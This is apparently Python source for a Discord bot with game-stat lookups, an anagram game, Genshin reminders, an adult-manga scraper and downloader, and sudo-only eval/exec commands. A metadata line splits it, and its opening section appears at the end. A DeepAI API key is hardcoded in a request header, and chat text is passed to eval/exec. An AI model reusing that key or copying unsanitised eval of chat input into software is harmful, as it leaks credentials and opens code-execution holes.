@client.command("External User Commands", ["osu", ("details", "summary"), "?"], "osu <details | summary> [player = me]", "report an osu player's public details or summary")
async def command_osu_details(command, message):
osu = await get_ext_user("osu", "an osu! player", command, message)
rv = requests.get(f"https://osu.ppy.sh/api/get_user?k={config['api-keys']['osu']}&u={osu}")
if rv.status_code == 200:
data = rv.json()
if data == []:
await send(message, "Could not find an osu! player by that username/ID!", reaction = "x")
else:
user = data[0]
if command[2] == "summary":
await send(message, embed = discord.Embed(title = f"osu! player details: {user['username']}", description = f"Level {user['level']}\nPP: {user['pp_raw']}\nRank: #{user['pp_rank']} (#{user['pp_country_rank']})\nAccuracy: {user['accuracy']}", color = client.color).set_thumbnail(url = f"http://s.ppy.sh/a/{user['user_id']}"))
else:
seconds = int(user["total_seconds_played"])
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
await send(message, embed = discord.Embed(
title = f"osu! player summary: {user['username']} #{user['user_id']}",
description = f"User since {user['join_date']}",
url = f"https://osu.ppy.sh/users/{user['user_id']}",
color = client.color
).add_field(
name = "Level",
value = user["level"]
).add_field(
name = "Accuracy",
value = user["accuracy"]
).add_field(
name = "Performance Points",
value = user["pp_raw"]
).add_field(
name = "Rank",
value = f"#{user['pp_rank']} (#{user['pp_country_rank']} in {pycountry.countries.get(alpha_2 = user['country']).name})"
).add_field(
name = "Score Counts",
value = " ".join(f"{user['count' + x]} {emoji('osu_' + x)}" for x in ["300", "100", "50"]),
inline = False
).add_field(
name = "Rating Counts",
value = " ".join(f"{user['count_rank_' + x.lower()]} {emoji('osu_' + x)}" for x in ["SSH", "SS", "SH", "S", "A"]),
inline = False
).add_field(
name = "Best Score",
value = user['ranked_score']
).add_field(
name = "Total Score",
value = user['total_score']
).add_field(
name = "Time Played",
value = f"{hours}:{str(minutes).zfill(2)}:{str(seconds).zfill(2)}"
).set_thumbnail(
url = f"http://s.ppy.sh/a/{user['user_id']}"
))
else:
await send(message, f"Failed to fetch from osu! API: status code {rv.status_code}!", reaction = "x")
def display_ow_rank(rating):
try:
rank = int(rating)
if rank < 1500:
e = "ow_bronze"
elif rank < 2000:
e = "ow_silver"
elif rank < 2500:
e = "ow_gold"
elif rank < 3000:
e = "ow_platinum"
elif rank < 3500:
e = "ow_diamond"
elif rank < 4000:
e = "ow_master"
else:
e = "ow_grandmaster"
return f"{rating} {emoji(e)}"
except:
return rating
@client.command("", [("ow", "overwatch"), "summary"], "", "")
@client.command("External User Commands", [("ow", "overwatch"), "summary", "?"], "ow/overwatch summary <player = me>", "report an overwatch player's summary")
async def command_ow_summary(command, message):
ow = await get_ext_user("ow", "a Blizzard battletag", command, message)
try:
r = requests.get(f"https://ow-api.com/v1/stats/pc/us/{ow}/profile")
if r.status_code != 200:
raise RuntimeError("Status Code not 200")
data = r.json()
try:
await send(message, embed = discord.Embed(
title = f"Overwatch player summary: {data['name']}",
description = "",
color = client.color
).add_field(
name = "Level",
value = str(data["level"] + 100 * data["prestige"])
).add_field(
name = "Rating",
value = display_ow_rank(data["rating"])
).add_field(
name = "Games Won",
value = str(data["gamesWon"])
).add_field(
name = "Competitive Winrate",
value = "%.2f%%" % (data["competitiveStats"]["games"]["won"] / data["competitiveStats"]["games"]["played"] * 100) if "games" in data["competitiveStats"] else "N/A"
).set_thumbnail(
url = data["icon"]
))
except:
print(traceback.format_exc())
await send(message, "Failed to generate embed!", reaction = "x")
except:
await send(message, f"Failed to fetch user data for `{ow}` from Overwatch API; check the spelling of this battletag (please format as `name-number`)!", reaction = "x")
@client.command("", [("lol", "league"), ("report", "current", "report-player", "current-player")], "", "")
@client.command("League of Legends Commands", [("lol", "league"), ("report", "current", "report-player", "current-player"), "?"], "lol/league <report | current>[-player] [player = me]", "create a game report for the player")
async def command_lol_report(command, message):
sm = await get_ext_user("lol", "a League of Legends summoner", command, message)
try:
summoner = watcher.summoner.by_name(lol_region, sm)
if command[2] == "report" or command[2] == "report-player":
try:
game = watcher.match.matchlist_by_account(lol_region, summoner["accountId"], end_index = 1)["matches"][0]
try:
if command[2] == "report":
await send(message, embed = await lol_game_embed(message.guild, game["gameId"], sm, False), reaction = "check")
elif command[2] == "report-player":
await send(message, embed = await lol_player_embed(message.guild, game["gameId"], sm, False), reaction = "check")
except:
print(traceback.format_exc())
await send(message, "Failed to create embed!", reaction = "x")
except Exception as e:
await send(message, f"Could not find a game for {lol_region.upper()}/{sm}! The summoner may not have played a proper game recently enough.", reaction = "x")
else:
try:
game = watcher.spectator.by_summoner(lol_region, summoner["id"])
try:
if command[2] == "current":
await send(message, embed = await lol_current_embed(message.guild, game, sm))
elif command[2] == "current-player":
await send(message, embed = await lol_current_player_embed(message.guild, game, [sm]))
except:
print(traceback.format_exc())
await send(message, "Failed to create embed!", reaction = "x")
except Exception as e:
await send(message, f"Could not find current game for {lol_region.upper()}/{sm}! The summoner may not be in game.", reaction = "x")
except:
await send(message, f"Could not find summoner {lol_region.upper()}/{sm}! Please check your spelling.", reaction = "x")
@client.command("League of Legends Commands", [("lol", "league"), "rotation"], "lol/league rotation", "check the current free champion rotation")
async def command_lol_rotation(command, message):
champions = [champs[cid] for cid in watcher.champion.rotations(lol_region)["freeChampionIds"]]
champions.sort()
await send(message, f"This week's free rotation is: {english_list(champions)}.")
@client.command("League of Legends Commands", [("lol", "league"), "ranges", "..."], "lol/league ranges <champion> [champion...]", "compare ability ranges for champions")
async def command_lol_ranges(command, message):
champs = set()
for champ in command[3:]:
champ = champ.lower()
if champ not in cmap:
await send(message, f"{champ} is not a recognized champion name or ID!", reaction = "x")
break
champs.add(cmap[champ])
else:
items = []
for champ in champs:
data = requests.get(f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/data/en_US/champion/{champ}.json").json()
items.append((data["data"][champ]["stats"]["attackrange"], data["data"][champ]["name"], "Basic Attack"))
for i, spell in enumerate(data["data"][champ]["spells"]):
ident = data["data"][champ]["name"] + " " + ("QWER"[i] if 0 <= i < 4 else "?")
if len(set(spell["range"])) == 1:
items.append((spell["range"][0], ident, spell["name"]))
else:
clusters = {}
for i, r in enumerate(spell["range"]):
if r not in clusters:
clusters[r] = []
clusters[r].append(i + 1)
for key in clusters:
items.append((key, ident, spell["name"] + " Rank " + "/".join(map(str, clusters[key]))))
items.sort()
stacked = []
for item in items:
if stacked == [] or item[0] != stacked[-1][0]:
stacked.append([item[0], []])
stacked[-1][1].append((item[1], item[2]))
info = "**Range Analysis**\n"
for rng, stack in stacked:
stack = ", ".join(f"{ident} ({name})" for ident, name in stack)
info += f"\n__{rng}__: {stack}"
await send(message, info, reaction = "check")
@client.command("League of Legends Commands", [("lol", "league"), "item", "?", "..."], "lol item <name>", "get details about an item")
async def command_lol_item(command, message):
item = find_item("".join(command[3:]).lower())
await send(message, embed = discord.Embed(
title = f"League of Legends Item: {item['name']} (#{item['id']})",
description = re.sub("(\\() (.)|(.) (\\))", "\\1\\2\\3\\4", re.sub(" +", " ", re.sub("<[^>]+?>", "", re.sub("<br>|<li>", "\n", item["description"])))),
color = client.color,
url = f"https://leagueoflegends.fandom.com/wiki/{item['name'].replace(' ', '_')}"
).add_field(
name = "Build Path",
value = build_path(item["id"]) + ("\n\nBuilds into: " + english_list(lolitems[key]["name"] for key in item.get("into")) if item.get("into") else "")
).add_field(
name = "Tags",
value = "\n".join("- " + {
"CriticalStrike": "Critical Strike",
"NonbootsMovement": "Movement Speed",
"SpellDamage": "Ability Power",
"MagicPenetration": "Magic Penetration",
"ArmorPenetration": "Armor Penetration",
"SpellBlock": "Magic Resistance",
"Slow": "Movement Reduction",
"Jungle": "Jungling",
"Health": "Health",
"Lane": "Laning",
"Aura": "Aura",
"HealthRegen": "Health Regeneration",
"SpellVamp": "Spell Vamp",
"GoldPer": "Gold Income",
"Mana": "Mana",
"Vision": "Vision",
"LifeSteal": "Physical Vamp",
"Consumable": "Consumable",
"Armor": "Armor",
"Stealth": "Stealth",
"ManaRegen": "Mana Regeneration",
"OnHit": "On-Hit",
"Active": "Active",
"CooldownReduction": "Cooldown Reduction",
"Trinket": "Trinket",
"AttackSpeed": "Attack Speed",
"Boots": "Boots",
"AbilityHaste": "Ability Haste",
"Tenacity": "Tenacity",
"Damage": "Attack Damage"
}[tag] for tag in item["tags"])
).set_thumbnail(
url = f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/img/item/{item['id']}.png"
))
stats_length = 24
async def stats(channel, vis = None):
counts = {}
async for message in channel.history(limit = None):
if not vis or message.author.id in vis:
uinfo = f"{truncate(message.author.name, stats_length - 5)}#{message.author.discriminator}"
counts[uinfo] = counts.get(uinfo, 0) + 1
return sorted(counts.items(), key = lambda a: (-a[1], a[0]))
def truncate(string, length):
if len(string) > length:
return string[:length - 1] + "…"
return string
@client.command("Server Statistics Commands", [("channel", "server"), "stats"], "<channel | server> stats", "output the number of messages sent in each channel by each user")
async def command_channel_stats(command, message):
v = set(m.id for m in message.channel.members)
async with message.channel.typing():
if command[1] == "channel":
s = await stats(message.channel, v)
total = sum(b for _, b in s)
mc = len(str(max(b for _, b in s)))
l = max(len(a) for a, _ in s)
await send(message, embed = discord.Embed(
title = f"Channel Stats for #{message.channel.name}",
description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in s) + "\n```",
color = client.color
))
else:
vis = set(message.channel.members)
counts = {}
ccount = {}
cname = {}
total = 0
failed = 0
for channel in message.guild.channels:
try:
if isinstance(channel, discord.TextChannel):
if set(channel.members) >= vis:
cname[channel.id] = channel.name
for uinfo, count in await stats(channel, v):
counts[uinfo] = counts.get(uinfo, 0) + count
ccount[channel.id] = ccount.get(channel.id, 0) + count
total += count
except:
failed += 1
mc = len(str(max(max(counts.values()), max(ccount.values()))))
ul = max(map(len, counts))
cl = max(map(len, cname.values()))
l = min(max(ul, cl), stats_length)
counts = sorted(counts.items(), key = lambda a: (-a[1], a[0]))
ccount = sorted(ccount.items(), key = lambda a: (-a[1], a[0]))
await send(message, embed = discord.Embed(
title = f"Server Stats for {message.guild.name}",
description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in counts) +
"\n\n" + "\n".join(f"#{truncate(cname[cid].ljust(l - 1), stats_length - 1)} {str(count).ljust(mc)} ({count / total:.2f}%)" for cid, count in ccount) + "\n```",
color = client.color
))
if failed:
await send(message, f"Failed to index the results from {failed} channel{'s' * (failed != 1)}; likely this bot does not have permission to access them.")
@client.command("Miscellaneous Commands", ["blame"], "blame", "blame a random person in this channel (cannot blame any bots)")
async def command_blame(command, message):
members = []
for member in message.channel.members:
if not member.bot:
members.append(member)
await send(message, f"It was {random.choice(members).mention}'s fault!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Miscellaneous Commands", ["spoiler", "image"], "spoiler image", "accept an image in a DM to spoiler (for mobile users)")
async def command_spoiler_image(command, message):
try:
await dm(message.author, f"The next image(s) you DM to me will be sent to {message.guild.name}#{message.channel.name} as a spoiler.")
await message.delete()
await set_data("dm_spoiler", message.author.id, message.channel.id)
except:
await send(message, "You need to allow me to DM you to use this feature!", reaction = "x")
@client.command("Miscellaneous Commands", ["color", "image"], "color image", "auto-color the next image you send in this channel with DeepAI")
async def command_spoiler_image(command, message):
await send(message, f"The next image you send in this channel will be automatically colored with the power of Artificial Intelligence.")
await set_data("img_color", message.author.id, message.channel.id, 0)
async def nhentai(nhid, force = False):
if force or not await has_data("nhentai", nhid):
response = requests.get(f"https://nhentai.net/g/{nhid}")
if response.status_code == 404:
raise BotError("404 Not Found!")
elif response.status_code == 200:
t = response.text
urls = {x.replace("t.", "i.", 1).replace("t.", ".") for x in re.findall("https://t\\.nhentai\\.net/galleries/\\d+/\\d+t\\.\\w+", t)}
urls = sorted(urls, key = lambda s: [int(x) for x in re.findall("\\d+", s)])
title = re.findall("<span class=\"pretty\">\\s*(.+?)\\s*</span>", t)[0]
subtitle = re.findall("<span class=\"after\">\\s*(.+?)\\s*</span>", t)[0]
sauce = int(re.findall("\\d+", urls[0])[0])
await set_data("nhentai", nhid, (title, subtitle, sauce, urls))
return (title, subtitle, sauce, urls)
else:
raise BotError(f"Unknown error: {response.status_code}")
else:
return await get_data("nhentai", nhid)
@client.command("Genshin Commands", ["genshin", "info", "..."], "genshin info <item>", "get info on an item (must enter the internal ID; ask a developer if unsure but it's not too counterintuitive)")
async def command_genshin_info(command, message):
item = " ".join(command[3:]).lower()
await client.genshin_info(item, message.channel)
await message.add_reaction("✅")
async def resin_set(user, amt):
await set_data("genshin", "resin_info", user.id, time.time() - 8 * 60 * amt)
async def resin_rmd(user):
return await get_data("genshin", "resin_reminder", user.id, default = -1)
async def resin_amount(uid):
if await has_data("genshin", "resin_info", uid):
return min(160, (time.time() - await get_data("genshin", "resin_info", uid)) / 8 / 60)
else:
return -1
def hm(s):
h, m = divmod(int(s // 60), 60)
return str(h) + "h" + str(m).zfill(2) if h else str(m) + "m"
@client.command("Genshin Commands", ["genshin", "resin", "set", "?"], "genshin resin set <amount>", "tell me how much resin you currently have")
async def command_genshin_resin_set(command, message):
amt = int(command[4])
await resin_set(message.author, amt)
cur = await resin_rmd(message.author)
msg = await send(message, "Set your resin!" + ("" if cur == -1 else f" Your existing reminder, set for {cur} resin, will occur in {hm(8 * 60 * (cur - amt))}."))
if message.guild:
await message.delete(delay = 5)
await msg.delete(delay = 5)
@client.command("Genshin Commands", ["genshin", "resin", "now"], "genshin resin now", "check how much resin you currently have")
async def command_genshin_resin_now(command, message):
amt = await resin_amount(message.author.id)
cur = await resin_rmd(message.author)
if amt == -1:
await send(message, "You haven't told me how much resin you have yet!", reaction = "x")
else:
await send(message, f"You currently have {int(amt)} resin!" + ("" if cur == -1 else f" Your reminder, set for {cur} resin, will occur in {hm(8 * 60 * (cur - amt))}."))
@client.command("Genshin Commands", ["genshin", "resin", "reminder"], "genshin resin reminder [[amount] <desired = 160>] / stop", "set / stop a reminder for when you reach a specific amount of resin; your current amount is optional if you've already set your resin amount")
@client.command("", ["genshin", "resin", "reminder", "?"], "", "")
@client.command("", ["genshin", "resin", "reminder", "?", "?"], "", "")
async def command_genshin_resin_reminder(command, message):
if len(command) == 5 and command[4] == "stop":
msg = await send(message, "I will no longer remind you about your resin!")
await del_data("genshin", "resin_reminder", message.author.id)
else:
if len(command) <= 5:
if not await has_data("genshin", "resin_info", message.author.id):
raise BotError("You need to tell me how much resin you have with `genshin resin set` or specify the amount you currently have!")
des = int(command[4]) if len(command) == 5 else 160
amt = await resin_amount(message.author.id)
else:
amt = int(command[4])
await resin_set(message.author, amt)
des = int(command[5])
if des > 160:
raise BotError("You cannot have more than 160 resin without using Fragile Resin to exceed that cap manually!")
if des <= amt:
raise BotError("You already have that much resin!")
cur = await resin_rmd(message.author)
if cur == -1:
msg = await send(message, f"I will remind you when you reach {des} resin (in {hm(8 * 60 * (des - amt))})!")
else:
msg = await send(message, f"You previously had a reminder for when you reached {cur} resin; I will instead remind you when you reach {des} (in {hm(8 * 60 * (des - amt))})!")
await set_data("genshin", "resin_reminder", message.author.id, des)
if message.guild:
await message.delete(delay = 5)
await msg.delete(delay = 5)
@client.command("", [("nhentai", "fnhentai"), "?"], "", "")
async def command_nhentai(command, message):
nhid = int(command[2])
title, subtitle, sauce, urls = await nhentai(nhid, command[1] == "fnhentai")
reply = await send(message, embed = discord.Embed(title = title + " " + subtitle, url = f"https://nhentai.net/g/{nhid}", description = f"Page 1 / {len(urls)}").set_image(url = urls[0]))
await reply.add_reaction("⬅️")
await reply.add_reaction("➡️")
await set_data("nhentai_embed", reply.id, (nhid, 0))
import httpx
import img2pdf, os
from PIL import Image
from PyPDF3 import PdfFileMerger
from io import BytesIO
async def get_async(url):
async with httpx.AsyncClient() as client:
return await client.get(url)
@client.command("", ["nhdownload", "?"], "", "")
async def command_nhdownload(command, message):
async with message.channel.typing():
nhid = int(command[2])
title, subtitle, sauce, urls = await nhentai(nhid, True)
try:
os.mkdir(f"/tmp/{nhid}")
except:
pass
merger = PdfFileMerger()
responses = await asyncio.gather(*map(get_async, urls))
for page, r in enumerate(responses):
pdf_path = f"/tmp/{nhid}/{page}.pdf"
pdf_bytes = img2pdf.convert(r.content)
with open(pdf_path, "wb") as f:
f.write(pdf_bytes)
merger.append(pdf_path)
final_path = f"/tmp/{nhid}/final.pdf"
merger.write(final_path)
merger.close()
try:
with open(final_path, "rb") as f:
await send(message, file = discord.File(fp = f, filename = f"[{nhid}] {title}.pdf"))
except:
await send(message, f"The file is too large to upload; you can access it here: https://dev.hyper-neutrino.xyz/nh/{nhid}")
@client.command("", lambda m: True, "", "")
async def command_image_spoiler_reply(command, message):
if type(message.channel) == discord.DMChannel:
if len(message.attachments) > 0:
if await has_data("dm_spoiler", message.author.id):
await client.get_channel(await get_data("dm_spoiler", message.author.id)).send(files = [(await attachment.to_file(spoiler = True)) for attachment in message.attachments])
await del_data("dm_spoiler", message.author.id)
@client.command("", lambda m: True, "", "")
async def command_image_spoiler_reply(command, message):
if len(message.attachments) > 0:
if await has_data("img_color", message.author.id, message.channel.id):
r = requests.post("https://api.deepai.org/api/colorizer", data = {"image": message.attachments[0].url}, headers = {"api-key": "551549c3-8d2c-426b-ae9f-9211b13e6f14"})
await send(message, r.json()["output_url"])
await del_data("img_color", message.author.id, message.channel.id)
@client.command("", ["echo", "..."], "echo <message>", "echo the message")
async def command_echo(command, message):
await send(message, message.content[message.content.find("echo") + 4:])
@client.command("", ["say", "..."], "say <message>", "echo, then immediately delete the command")
async def command_say(command, message):
await send(message, message.content[message.content.find("say") + 3:])
await message.delete()
@client.command("", ["eval", "?", "..."], "eval <expr>", "evaluate a Python expression in a command function's scope")
async def command_eval(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!", reaction = "x")
else:
try:
code = message.content[message.content.find("eval") + 4:].strip()
if code.startswith("```python"):
code = code[9:]
elif code.startswith("```py"):
code = code[5:]
code = code.strip("`")
await send(message, str(eval(code))[:2000])
except:
await send(message, "Error evaluating expression!", reaction = "x")
@client.command("", ["exec", "?", "..."], "exec <code>", "execute Python code in a command function's scope (print is replaced with message output)")
async def command_exec(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!", reaction = "x")
else:
try:
code = message.content[message.content.find("exec") + 4:].strip()
if code.startswith("```python"):
code = code[9:]
elif code.startswith("```py"):
code = code[5:]
code = code.strip("`")
output = []
def print(*items, end = "\n", sep = " "):
output.extend(list(sep.join(map(str, items)) + end))
exec(code)
await send(message, "```python\n" + "".join(output[:1980]) + "\n```")
except:
await send(message, "Error executing expression!", reaction = "x")
@client.command("", ["adjust", "ehecd", "?"], "adjust ehecd <x>", "adjust the cooldown of ehe te nandayo")
async def command_exec(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!", reaction = "x")
else:
try:
await set_data("ehecd", int(command[3]))
await send(message, f"Cooldown of 'ehe te nandayo' is now {command[3]} second{'s' * (command[3] != '1')}!")
except:
await send(message, "Error; make sure you entered an integer!", reaction = "x")
@client.command("", ["data", "..."], "data", "fetch data from the bot")
async def command_data(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!")
else:
await send(message, "```python\n" + str(await get_data(*map(eval, command[2:]), default = None, set_if_missing = False))[:1980] + "\n```")
@client.command("", ["identify", "?"], "identify <user>", "identify a user")
async def command_identify(command, message):
member = await get_member(message.guild, command[2], message.author)
await send(message, f"Identified {member.name}#{member.discriminator}, a.k.a {member.display_name}, I.D. {member.id} ({member.mention})", allowed_mentions = discord.AllowedMentions.none())
@client.command("", ["emoji", "?", "-"], "", "")
@client.command("", ["emoji", "?"], "emoji <lookup> [-]", "post an emoji by lookup ID")
async def command_emoji(command, message):
try:
await send(message, str(emoji(command[2])))
if len(command) == 4:
await message.delete()
except:
await send(message, "That resulted in an error.", reaction = "x")
raise
@client.command("", [("summary", "summarize"), "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?", "?"], "", "")
async def command_summarize(command, message):
url = command[2]
if url[0] == "<" and url[-1] == ">":
url = url[1:-1]
await message.edit(suppress = True)
rurl = f"https://api.smmry.com/?SM_API_KEY={config['api-keys']['sm']}"
if len(command) >= 4:
rurl += "&SM_LENGTH=" + command[3]
if len(command) >= 5:
rurl += "&SM_KEYWORD_COUNT=" + command[4]
rurl += "&SM_URL=" + url
r = requests.get(rurl)
data = r.json()
if "sm_api_error" in data:
error = data["sm_api_error"]
if error == 0:
await send(message, "Internal server problem with the SMMRY API; this is not your fault. Try again later.", reaction = "x")
elif error == 1:
await send(message, "Parameters are invalid. Check that you entered a real URL; otherwise, contact a developer.", reaction = "x")
elif error == 2:
await send(message, "This request has intentionally been restricted. Perhaps you have expended the API key's limit (100 per day).", reaction = "x")
elif error == 3:
await send(message, "Summarization error. This website might not be summarizable.")
else:
await send(message, (f"**{data['sm_api_title'].strip() or '(no title)'}**\n\n{data['sm_api_content'].strip() or '(no content)'}")[:2000])
if "sm_api_keyword_array" in data:
await message.channel.send(f"**Keywords**: {', '.join(data['sm_api_keyword_array'])}")
@client.command("", ["tsr", "?"], "", "")
async def command_toggle_suppress_reacts(command, message):
member = await get_member(message.guild, command[2], message.author)
await mod_data("tsr", lambda x: x ^ {member.id}, default = set())
await message.add_reaction("✅")
@client.command("", ["react", "..."], "", "")
async def command_react(command, message):
if not message.reference or not message.reference.resolved:
raise BotError("You need to refer to a message via reply!")
fails = []
for x in command[2:]:
try:
await message.reference.resolved.add_reaction(emoji(x))
except:
fails.append(x)
if fails:
await send(message, "The following emojis do not exist / could not have been added: " + ", ".join(fails))
else:
await message.delete()
# @client.command("", re.compile(r"\b[hH]?[eE][hH][eE]\b").search, "", "")
async def command_ehe_te_nandayo(command, message):
if message.author != client.user and time.time() - await get_data("ehe", message.author.id, default = 0) > (await get_data("ehecd", default = 30)):
await send(message, "**ehe te nandayo!?**", reaction = "?")
await set_data("ehe", message.author.id, time.time())
# @client.command("", re.compile(r"\[\w+\]").search, "", "")
async def command_emoji_react(command, message):
for c in re.findall(r"\[(\w+)\]", message.content):
try:
await message.add_reaction(emoji(c))
except:
pass
# @client.command("", re.compile(r"\b[Aa][Oo][Cc]\b").search, "", "")
async def command_aoc(command, message):
await message.channel.send("Alexandria Ocasio-Cortez")
# @client.command("", ["toggle69"], "", "")
async def command_toggle69(command, message):
await set_data("disable_69", not await get_data("disable_69", default = False))
await message.add_reaction("✅")
# @client.command("", re.compile(r"\b69\b").search, "", "")
async def command_69(command, message):
if await get_data("disable_69", default = False):
return
await message.reply("nice", mention_author = False) | 49.029657 | 331 | 0.638508 | import asyncio, datetime, discord, json, pycountry, random, re, requests, time, traceback
from aioconsole import ainput
from word2number import w2n
from client import *
from datamanager import config, del_data, get_data, has_data, mod_data, set_data, batch_set_data
from discordutils import *
from league import *
async def dm(user, *a, **k):
channel = user.dm_channel
if channel is None:
channel = await user.create_dm()
await channel.send(*a, **k)
@client.command("", ["help"], "", "")
@client.command("General Commands", ["help", "rpg"], "help [rpg]", "post a list of commands")
async def command_help(command, message):
sections = {}
for section, _, syntax, description, _ in client.commands:
if section == "" or ((section == "RPG Commands") ^ (len(command) == 3)): continue
if section not in sections:
sections[section] = []
sections[section].append(f"`{syntax}` - {description}")
embed = discord.Embed(
title = "Help - Commands",
color = client.color
)
for section in sections:
embed.add_field(name = section, value = "\n".join(sections[section]), inline = False)
await dm(message.author, embed = embed)
await send(message, "Sent the command list to your DMs!")
@client.command("General Commands", ["ping"], "ping", "check your ping")
async def command_ping(command, message):
ping = int((time.time() - (message.created_at - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds = 1)) * 1000)
await send(message, f"Pong! ({ping} ms)", reaction = "🏓")
@client.command("Channel Type Commands", ["subscribe"], "subscribe", "announce updates to this channel")
async def command_subscribe(command, message):
await mod_data("announcement_channels", lambda x: x | {message.channel.id}, default = set())
await send(message, "Subscribed to status updates here!")
@client.command("Channel Type Commands", ["unsubscribe"], "unsubscribe", "stop announcing updates to this channel")
async def command_unsubscribe(command, message):
await mod_data("announcement_channels", lambda x: x - {message.channel.id}, default = set())
await send(message, "Unsubscribed from status updates here!")
@client.command("Channel Type Commands", ["watch", ("osu", "genshin")], "watch osu/genshin", "watch osu!/Genshin Impact updates here")
async def command_watch(command, message):
await mod_data("watch_channels", command[2], lambda x: x | {message.channel.id}, default = set())
await send(message, "Now watching " + {"osu": "osu!", "genshin": "Genshin Impact"}[command[2]] + " updates in this channel!")
@client.command("Channel Type Commands", ["unwatch", ("osu", "genshin")], "unwatch osu/genshin", "stop watching osu!/Genshin Impact updates here")
async def command_watch(command, message):
await mod_data("watch_channels", command[2], lambda x: x - {message.channel.id}, default = set())
await send(message, "No longer watching " + {"osu": "osu!", "genshin": "Genshin Impact"}[command[2]] + " updates in this channel!")
words = None
wordmap = {}
with open("data/words.txt") as f:
words = [x for x in f.read().strip().splitlines() if 5 <= len(x)]
for word in words:
key = "".join(sorted(word))
if key not in wordmap:
wordmap[key] = set()
wordmap[key].add(word)
anagram_lock = asyncio.Lock()
def display(actual, scrambled, hint):
if hint == 0: return scrambled
cl = list(scrambled)
start = actual[:hint if hint * 2 <= len(actual) else -hint]
end = actual[-hint:]
for c in start + end:
cl.remove(c)
return f"**{start}**{''.join(cl)}**{end}**"
async def anagram_function(message, answer = None, start = False, stop = False, hint = False, reorder = False):
global words, wordmap
async with anagram_lock:
active = await has_data("anagram", message.channel.id, "puzzle")
puzzle = await get_data("anagram", message.channel.id, "puzzle", default = "", set_if_missing = False)
answers = wordmap.get("".join(sorted(puzzle)), set())
current_hint = await get_data("anagram", message.channel.id, "hint", default = 0, set_if_missing = False)
if reorder:
if active:
charlist = list(puzzle)
random.shuffle(charlist)
puzzle = "".join(charlist)
await set_data("anagram", message.channel.id, "puzzle", puzzle)
await send(message, f"Reordered: solve for '{display(sorted(answers)[0], puzzle, current_hint)}' ({len(puzzle)}).")
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if hint:
if active:
if len(puzzle) - current_hint * 2 - 2 <= 1:
stop = True
else:
await set_data("anagram", message.channel.id, "hint", current_hint + 1)
await send(message, f"Hint: 2 more letters shown: solve for '{display(sorted(answers)[0], puzzle, current_hint + 1)}' ({len(puzzle)}).")
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if stop:
if active:
if len(answers) == 1:
await send(message, f"Anagram puzzle ended! The correct answer was '{list(answers)[0]}'.")
else:
await send(message, f"Anagram puzzle ended! The correct answers were {english_list(quote(answers))}.")
await del_data("anagram", message.channel.id)
active = False
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if active and answer in answers:
try:
points = len(answer) - 2 * await get_data("anagram", message.channel.id, "hint")
bonus = int(points / 2) * (time.time() - await get_data("anagram", message.channel.id, "timestamp", default = 0) <= 5)
await mod_data("leaderboard", "anagram", message.author.id, lambda x: x + points + bonus, default = 0)
await batch_set_data("anagram", message.channel.id, active = False, last = answers, lasttime = time.time())
active = False
bonus_display = f" **+{bonus}**" if bonus else ""
alt_display = f" (Alternative answers: {english_list(quote(answers - {answer}))})" if len(answers) > 1 else ""
await send(message, f"Congratulations to {message.author.mention} for winning the anagram puzzle! (+{points}{bonus_display}){alt_display}", allowed_mentions = discord.AllowedMentions.none())
start = True
except:
print(traceback.format_exc())
elif answer in await get_data("anagram", message.channel.id, "last", default = set()) and time.time() - await get_data("anagram", message.channel.id, "lasttime", default = 0) <= 1:
await send(message, f"{message.author.mention} L", reaction = "x", allowed_mentions = discord.AllowedMentions.none())
if start:
if active:
hint = await get_data("anagram", message.channel.id, "hint", default = 0)
actual = sorted(answers)[0]
await send(message, f"An anagram puzzle is already running! Solve for '{display(actual, puzzle, hint)}' ({len(puzzle)}).", reaction = "x")
else:
word = random.choice(words)
charlist = list(word)
random.shuffle(charlist)
scrambled = "".join(charlist)
await batch_set_data("anagram", message.channel.id, active = True, puzzle = scrambled, hint = 0, timestamp = time.time())
await send(message, f"Anagram puzzle! Solve for '{scrambled}' ({len(word)}).")
@client.command("Anagram Commands", ["anagram"], "anagram start", "start an anagram puzzle")
async def command_anagram_start(command, message):
await anagram_function(message, start = True)
@client.command("Anagram Commands", ["anagram", "restart"], "anagram restart", "restart the anagram puzzle")
async def command_anagram_restart(command, message):
await anagram_function(message, stop = True, start = True)
@client.command("Anagram Commands", ["anagram", "stop"], "anagram stop", "stop the anagram puzzle")
async def command_anagram_stop(command, message):
await anagram_function(message, stop = True)
@client.command("Anagram Commands", ["anagram", "shuffle"], "anagram shuffle", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "scramble"], "anagram scramble", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "reorder"], "anagram reorder", "reorder the anagram puzzle")
async def command_anagram_reorder(command, message):
await anagram_function(message, reorder = True)
@client.command("Anagram Commands", ["anagram", "hint"], "anagram hint", "show another character in the anagram puzzle")
async def command_anagram_hint(command, message):
await anagram_function(message, hint = True)
@client.command("Anagram Commands", ["anagram", "add", "?"], "anagram add <word>", "add a word to the anagram dictionary")
async def command_anagram_add(command, message):
global words, wordmap
word = command[3].strip().lower()
if all(char in "abcdefghijklmnopqrstuvwxyz" for char in word):
if word in words:
await send(message, "This word is already in the dictionary!", reaction = "x")
else:
words.append(word)
words.sort()
with open("data/words.txt", "w") as f:
f.write("\n".join(words))
key = "".join(sorted(word))
if key not in wordmap:
wordmap[key] = set()
wordmap[key].add(word)
await send(message, f"Added '{word}' to the dictionary!")
else:
await send(message, "Words must only contain letters!", reaction = "x")
